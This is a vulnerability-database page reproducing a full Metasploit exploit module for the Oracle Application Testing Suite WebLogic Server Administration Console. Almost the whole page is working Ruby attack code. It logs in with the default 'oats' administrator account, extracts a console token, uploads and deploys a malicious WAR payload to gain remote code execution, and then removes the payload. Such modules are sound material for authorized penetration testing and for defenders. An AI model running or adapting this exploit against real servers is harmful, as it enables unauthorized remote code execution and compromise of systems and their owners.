Search...

Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)

2019-05-29T00:00:00
ID EDB-ID:46942
Type exploitdb
Reporter Exploit-DB
Modified 2019-05-29T00:00:00

Description

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Oracle Application Testing Suite WebLogic Server Administration Console War Deployment',
      'Description'    => %q{
        This module abuses a feature in WebLogic Server's Administration Console to install
        a malicious Java application in order to gain remote code execution. Authentication
        is required, however by default, Oracle ships with a "oats" account that you could
        log in with, which grants you administrator access.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Steven Seeley', # Used the trick and told me about it
          'sinn3r'         # Metasploit module
        ],
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'WebLogic Server Administration Console 12 or prior', { } ]
        ],
      'References'     =>
        [
          # The CVE description matches what this exploit is doing, but it was for version
          # 9.0 and 9.1. We are not super sure whether this is the right CVE or not.
          # ['CVE', '2007-2699']
        ],
      'DefaultOptions' =>
        {
          'RPORT' => 8088
        },
      'Notes'          =>
        {
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability'   => [ CRASH_SAFE ]
        },
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 13 2019',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']),
        OptString.new('OATSUSERNAME', [true, 'The username for the admin console', 'oats']),
        OptString.new('OATSPASSWORD', [true, 'The password for the admin console'])
      ])

    register_advanced_options(
      [
        OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\OracleATS'])
      ])
  end

  class LoginSpec
    attr_accessor :admin_console_session
  end

  def login_spec
    @login_spec ||= LoginSpec.new
  end

  class OatsWarPayload < MetasploitModule
    attr_reader :name
    attr_reader :war

    def initialize(payload)
      @name = [Faker::App.name, Rex::Text.rand_name].sample
      @war = payload.encoded_war(app_name: name).to_s
    end
  end

  def default_oats_path
    datastore['DefaultOatsPath']
  end

  def war_payload
    @war_payload ||= OatsWarPayload.new(payload)
  end

  def set_frsc
    value = get_deploy_frsc
    @frsc = value
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
    })

    if res && res.body.include?('Oracle WebLogic Server Administration Console')
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def set_admin_console_session(res)
    cookie = res.get_cookies
    admin_console_session = cookie.scan(/ADMINCONSOLESESSION=(.+);/).flatten.first
    vprint_status("Token for console session is: #{admin_console_session}")
    login_spec.admin_console_session = admin_console_session
  end

  def is_logged_in?(res)
    html = res.get_html_document
    a_element = html.at('a')
    if a_element.respond_to?(:attributes) && a_element.attributes['href']
      link = a_element.attributes['href'].value
      return URI(link).request_uri == '/console'
    end

    false
  end

  def do_login
    uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => uri
    })

    fail_with(Failure::Unknown, 'No response from server') unless res
    set_admin_console_session(res)

    uri = normalize_uri(target_uri.path, 'console', 'j_security_check')
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => uri,
      'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_post' =>
        {
          'j_username'           => datastore['OATSUSERNAME'],
          'j_password'           => datastore['OATSPASSWORD'],
          'j_character_encoding' => 'UTF-8'
        }
    })

    fail_with(Failure::Unknown, 'No response while trying to log in') unless res
    fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res)
    store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD'])
    set_admin_console_session(res)
  end

  def get_deploy_frsc
    # First we are just going through the pages in a specific order to get the FRSC value
    # we need to prepare uploading the WAR file.
    res = nil
    requests =
      [
        { path: 'console/', vars: {} },
        { path: 'console/console.portal', vars: {'_nfpb'=>"true"} },
        { path: 'console/console.portal', vars: {'_nfpb'=>"true", '_pageLabel' => 'HomePage1'} }
      ]

    requests.each do |req|
      res = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalize_uri(target_uri.path, req[:path]),
        'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
        'vars_get' => req[:vars]
      })

      fail_with(Failure::Unknown, 'No response while retrieving FRSC') unless res
    end

    html = res.get_html_document
    hidden_input = html.at('input[@name="ChangeManagerPortletfrsc"]')
    frsc_attr = hidden_input.respond_to?(:attributes) ? hidden_input.attributes['value'] : nil
    frsc_attr ? frsc_attr.value : ''
  end

  def do_select_upload_action
    action = '/com/bea/console/actions/app/install/selectUploadApp'
    app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\servers\\AdminServer\\upload')
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'    => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get'  =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
      'vars_post' =>
        {
          'AppApplicationInstallPortletselectedAppPath' => app_path,
          'AppApplicationInstallPortletfrsc' => frsc
        }
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
  end

  def do_upload_app_action
    action = '/com/bea/console/actions/app/install/uploadApp'
    ctype = 'application/octet-stream'
    app_cname = 'AppApplicationInstallPortletuploadAppPath'
    plan_cname = 'AppApplicationInstallPortletuploadPlanPath'
    frsc_cname = 'AppApplicationInstallPortletfrsc'
    war = war_payload.war
    war_name = war_payload.name
    post_data = Rex::MIME::Message.new
    post_data.add_part(war, ctype, 'binary', "form-data; name=\"#{app_cname}\"; filename=\"#{war_name}.war\"")
    post_data.add_part('', ctype, nil, "form-data; name=\"#{plan_cname}\"; filename=\"\"")
    post_data.add_part(frsc, nil, nil, "form-data; name=\"#{frsc_cname}\"")

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
       'ctype'   => "multipart/form-data; boundary=#{post_data.bound}",
       'data'    => post_data.to_s
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
    print_response_message(res)
  end

  def do_app_select_action
    action = '/com/bea/console/actions/app/install/appSelected'
    war_name = war_payload.name
    app_path = Rex::FileUtils.normalize_win_path(default_oats_path, "oats\\servers\\AdminServer\\upload\\#{war_name}.war")

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
      'vars_post' =>
        {
          'AppApplicationInstallPortletselectedAppPath' => app_path,
          'AppApplicationInstallPortletfrsc'            => frsc
        }
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
    print_response_message(res)
  end

  def do_style_select_action
    action = '/com/bea/console/actions/app/install/targetStyleSelected'

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
      'vars_post' =>
        {
          'AppApplicationInstallPortlettargetStyle' => 'Application',
          'AppApplicationInstallPortletfrsc'        => frsc
        }
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
  end

  def do_finish_action
    action = '/com/bea/console/actions/app/install/finish'

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
      'vars_post' =>
        {
          'AppApplicationInstallPortletname'             => war_payload.name,
          'AppApplicationInstallPortletsecurityModel'    => 'DDOnly',
          'AppApplicationInstallPortletstagingStyle'     => 'Default',
          'AppApplicationInstallPortletplanStagingStyle' => 'Default',
          'AppApplicationInstallPortletfrsc'             => frsc
        }
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
    print_response_message(res)

    # 302 is a good enough indicator of a successful upload, otherwise
    # the server would actually return a 200 with an error message.
    res.code == 302
  end

  def print_response_message(res)
    html = res.get_html_document
    message_div = html.at('div[@class="message"]')
    if message_div
      msg = message_div.at('span').text
      print_status("Server replies: #{msg.inspect}")
    end
  end

  def deploy_war
    set_frsc
    print_status("FRSC value: #{frsc}")
    do_select_upload_action
    do_upload_app_action
    do_app_select_action
    do_style_select_action
    do_finish_action
  end

  def goto_war(name)
    print_good("Operation \"#{name}\" is a go!")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, name)
    })

    print_status("Code #{res.code} on \"#{name}\" request") if res
  end

  def undeploy_war
    war_name = war_payload.name
    handle = 'com.bea.console.handles.JMXHandle("com.bea:Name=oats,Type=Domain")'
    contents = %Q|com.bea.console.handles.AppDeploymentHandle("com.bea:Name=#{war_name},Type=AppDeployment")|
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationUninstallPortletreturnTo' => 'AppDeploymentsControlPage',
          'AppDeploymentsControlPortlethandle' => handle
        },
      'vars_post' =>
        {
          # For some reason, the value given to the server is escapped twice.
          # The Metasploit API should do it at least once.
          'AppApplicationUninstallPortletchosenContents' => CGI.escape(contents),
          '_pageLabel' => 'AppApplicationUninstallPage',
          '_nfpb'      => 'true',
          'AppApplicationUninstallPortletfrsc' => frsc
        }
    })

    if res && res.code == 302
      print_good("Successfully undeployed #{war_name}.war")
    else
      print_warning("Unable to successfully undeploy #{war_name}.war")
      print_warning('You may want to do so manually.')
    end
  end

  def cleanup
    undeploy_war if is_cleanup_ready
    super
  end

  def setup
    @is_cleanup_ready = false
    super
  end

  def exploit
    unless check == Exploit::CheckCode::Detected
      print_status('Target does not have the login page we are looking for.')
      return
    end

    do_login
    print_good("Logged in as #{datastore['OATSUSERNAME']}:#{datastore['OATSPASSWORD']}")
    print_status("Ready for war. Codename \"#{war_payload.name}\" at #{war_payload.war.length} bytes")
    result = deploy_war
    if result
      @is_cleanup_ready = true
      goto_war(war_payload.name)
    end
  end

  attr_reader :frsc
  attr_reader :is_cleanup_ready
end
JSON Vulners Source
Initial Source


All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to content@vulners.com Vulners, 2018
Protected by